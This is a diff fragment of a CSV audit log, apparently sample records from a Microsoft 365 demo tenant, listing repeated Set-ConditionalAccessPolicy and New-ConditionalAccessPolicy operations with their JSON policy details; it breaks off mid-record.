+2020-04-09T17:38:32Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:38:32 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:38:32Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:38:31 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T16:38:23Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-08T16:30:03.9601802Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 4:38:22 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T16:38:25Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-08T16:30:03.9601802Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 4:38:24 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T16:45:29Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-08T16:30:03.9601802Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 4:45:28 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T16:45:26Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-08T16:30:03.9601802Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 4:45:25 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T16:41:51Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 4:41:51 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T16:33:48Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 4:33:47 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T16:31:33Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-08T16:30:03.9601802Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 4:31:33 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T16:31:24Z,,,New-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-04-08T16:29:58Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-08T16:28:53.8094717Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 4:29:57 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T17:03:21Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-08T16:30:03.9601802Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 5:03:20 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T17:03:23Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-08T16:30:03.9601802Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 5:03:22 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T16:45:26Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-08T16:30:03.9601802Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 4:45:26 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T16:45:28Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-08T16:30:03.9601802Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 4:45:28 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T17:31:38Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 5:31:38 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T17:31:39Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 5:31:39 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T17:35:18Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-08T16:30:03.9601802Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 5:35:18 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T17:35:20Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-08T16:30:03.9601802Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 5:35:19 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T17:35:18Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-08T16:30:03.9601802Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 5:35:18 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T17:35:19Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-08T16:30:03.9601802Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 5:35:19 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T16:59:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 4:59:37 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T17:03:20Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-08T16:30:03.9601802Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 5:03:19 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T17:03:19Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-08T16:30:03.9601802Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 5:03:18 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-08T16:59:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/8/2020 4:59:36 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T16:58:29Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T16:55:34.0725731Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 4:58:29 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T16:58:27Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 4:58:26 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T16:56:59Z,,,New-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-04-09T16:56:54Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T16:55:34.0725731Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 4:56:53 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:03:03Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:03:03 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:02:25Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:02:25 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
